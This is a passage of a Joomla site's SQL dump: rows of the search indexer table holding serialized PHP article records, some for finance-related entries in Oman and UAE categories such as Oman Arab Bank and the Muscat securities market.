5:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":0:{}}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"2\";s:8:\"category\";s:7:\"Joomla!\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:9:\"24:joomla\";s:7:\"catslug\";s:9:\"19:joomla\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:63:\"index.php/pages/joomla/19-sample-data-articles/joomla/24-joomla\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:7:\"Joomla!\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Joomla!\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:7:\"Joomla!\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Joomla!\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:47:\"index.php?option=com_content&view=article&id=24\";s:5:\"route\";s:81:\"index.php?option=com_content&view=article&id=24:joomla&catid=19:joomla&Itemid=512\";s:5:\"title\";s:7:\"Joomla!\";s:11:\"description\";s:393:\"Congratulations! You have a Joomla! site! Joomla! makes your site easy to build a website just the way you want it and keep it simple to update and maintain. Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors. Joomla is open source, which means you can make it work just the way you want it to.\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2011-01-01 00:00:01\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2011-01-01 00:00:01\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(20,'index.php?option=com_content&view=article&id=100','index.php?option=com_content&view=article&id=100:offcanvas-menu&catid=82:oman&Itemid=435','OAB','OMAN ARAB BANK','2015-03-15 03:43:48','78959dea5f72dc3199582533f1869554',1,1,1,'en-GB','2013-12-18 09:37:42','0000-00-00 00:00:00','2013-12-18 09:37:42','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:3:\"100\";s:5:\"alias\";s:14:\"offcanvas-menu\";s:7:\"summary\";s:21:\"<p>OMAN ARAB BANK</p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"82\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-03-15 07:43:48\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"5\";s:8:\"ordering\";s:1:\"2\";s:8:\"category\";s:4:\"Oman\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:18:\"100:offcanvas-menu\";s:7:\"catslug\";s:7:\"82:oman\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:36:\"index.php/82-oman/100-offcanvas-menu\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:4:\"Oman\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:4:\"Oman\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:48:\"index.php?option=com_content&view=article&id=100\";s:5:\"route\";s:88:\"index.php?option=com_content&view=article&id=100:offcanvas-menu&catid=82:oman&Itemid=435\";s:5:\"title\";s:3:\"OAB\";s:11:\"description\";s:14:\"OMAN ARAB BANK\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2013-12-18 09:37:42\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2013-12-18 09:37:42\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(21,'index.php?option=com_content&view=article&id=99','index.php?option=com_content&view=article&id=99:easy-customization&catid=82:oman&Itemid=435','MSM','muscat security market','2015-03-15 03:47:03','4f31baac71b313ec43735a0c348e5783',1,1,1,'en-GB','2013-12-18 09:36:46','0000-00-00 00:00:00','2013-12-18 09:36:46','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:2:\"99\";s:5:\"alias\";s:18:\"easy-customization\";s:7:\"summary\";s:29:\"<p>muscat security market</p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"82\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-03-15 07:47:03\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"5\";s:8:\"ordering\";s:1:\"3\";s:8:\"category\";s:4:\"Oman\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:21:\"99:easy-customization\";s:7:\"catslug\";s:7:\"82:oman\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:39:\"index.php/82-oman/99-easy-customization\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:4:\"Oman\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:4:\"Oman\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:47:\"index.php?option=com_content&view=article&id=99\";s:5:\"route\";s:91:\"index.php?option=com_content&view=article&id=99:easy-customization&catid=82:oman&Itemid=435\";s:5:\"title\";s:3:\"MSM\";s:11:\"description\";s:22:\"muscat security market\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2013-12-18 09:36:46\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2013-12-18 09:36:46\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(22,'index.php?option=com_content&view=article&id=102','index.php?option=com_content&view=article&id=102:fluid-layout&catid=82:oman&Itemid=435','United','United','2015-03-15 03:49:26','137d043df5ff179cd0eb427e3d55ce4c',1,1,1,'en-GB','2013-12-18 09:31:34','0000-00-00 00:00:00','2013-12-18 09:31:34','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:3:\"102\";s:5:\"alias\";s:12:\"fluid-layout\";s:7:\"summary\";s:13:\"<p>United</p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"82\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-03-15 07:49:26\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"6\";s:8:\"ordering\";s:1:\"1\";s:8:\"category\";s:4:\"Oman\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:16:\"102:fluid-layout\";s:7:\"catslug\";s:7:\"82:oman\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:34:\"index.php/82-oman/102-fluid-layout\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:4:\"Oman\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:4:\"Oman\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:48:\"index.php?option=com_content&view=article&id=102\";s:5:\"route\";s:86:\"index.php?option=com_content&view=article&id=102:fluid-layout&catid=82:oman&Itemid=435\";s:5:\"title\";s:6:\"United\";s:11:\"description\";s:6:\"United\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2013-12-18 09:31:34\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2013-12-18 09:31:34\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(23,'index.php?option=com_content&view=article&id=111','index.php?option=com_content&view=article&id=111:business-pages&catid=84:uae&Itemid=435','DFM','DFM','2015-03-15 03:52:21','9aa2640e0f701ad5d13d1b710476204f',1,1,1,'en-GB','2014-03-31 06:04:29','0000-00-00 00:00:00','2014-03-31 06:04:29','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:3:\"111\";s:5:\"alias\";s:14:\"business-pages\";s:7:\"summary\";s:10:\"<p>DFM</p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"84\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-03-15 07:52:21\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_